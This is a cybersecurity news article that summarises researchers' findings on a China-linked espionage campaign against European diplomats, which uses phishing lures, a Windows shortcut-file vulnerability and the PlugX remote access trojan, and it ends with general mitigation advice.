UNC6384 Uses a Windows Exploit to Target European Diplomatic Bodies
UNC6384 Uses a Windows Exploit to Target European Diplomatic Bodies
The spear-phishing attack deceives diplomatic staff into clicking on harmful websites by using phony lures with NATO and European Commission themes.
Since September, European diplomatic institutions in Hungary and Belgium have been the subject of a cyber-espionage campaign by UNC6384, a threat actor with ties to China.
In addition to exploiting the high-severity Windows vulnerability CVE-2025-9491, the group used what Arctic Wolf researchers are calling “refined social engineering” in their attacks.
The group is confident in its success despite greater defender awareness, according to the researchers, as seen by its readiness to leverage publicly known vulnerabilities that have been extensively attacked by several nation-state actors.
Spear-phishing emails with a URL that eventually distributes malicious LNK files are the first step in the attack chain. With realistic features intended to entice the intended target, these files are intended to mimic European Commission meetings, NATO-related workshops, and diplomatic gatherings.
Before running obfuscated PowerShell commands that start a chain of infection, the files take advantage of a Windows vulnerability. The PlugX remote access Trojan (RAT) is eventually deployed as a result of this.
Arctic Wolf researchers say the campaign is spreading to government agencies in Serbia and the wider European diplomatic community, including Italy and the Netherlands. In the past, UNC6384 has targeted embassies in Southeast Asia.
The researchers believe that PlugX malware versions are a preferred tool among Chinese threat actors, and the organization specializes in their distribution. First noticed in 2008, PlugX provides a range of remote access features, such as keylogging, persistence establishment, and command execution. The virus can use anti-analysis methods and anti-debugging checks to avoid detection and is also known by the names Destroy RAT, SOGU, Kaba, Korplug, and TIGERPLUG.
The FBI and the US Justice Department completed their attempts to remove the PlugX malware from thousands of devices worldwide at the beginning of this year. Threat groups Twill Typhoon and Mustang Panda, who utilized the malware to infect consumers’ devices and steal data, were the focus of the operation.
Users and businesses will now need to put mitigation measures in place as UNC6384 continues to rapidly adapt vulnerability exploits and other approaches, as well as spread globally. The researchers advise businesses, particularly those in the government and diplomatic sectors, to evaluate and block the command-and-control (C2) infrastructures mentioned in the paper, do endpoint environment searches, and maintain security awareness training in order to lessen the impact of such assaults.
Long-term effects like “exfiltration of classified or sensitive documents, monitoring of real-time policy discussions and decision-making processes, collection of credentials for accessing diplomatic networks and partner systems, and surveillance of diplomatic calendars and travel plans” could result if these threat actors’ attacks are successful, according to the researchers’ report.
About the Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
Read More:
WhatsApp Fake Wedding Card Link Hacked Phones in Rajasthan?
About Author
English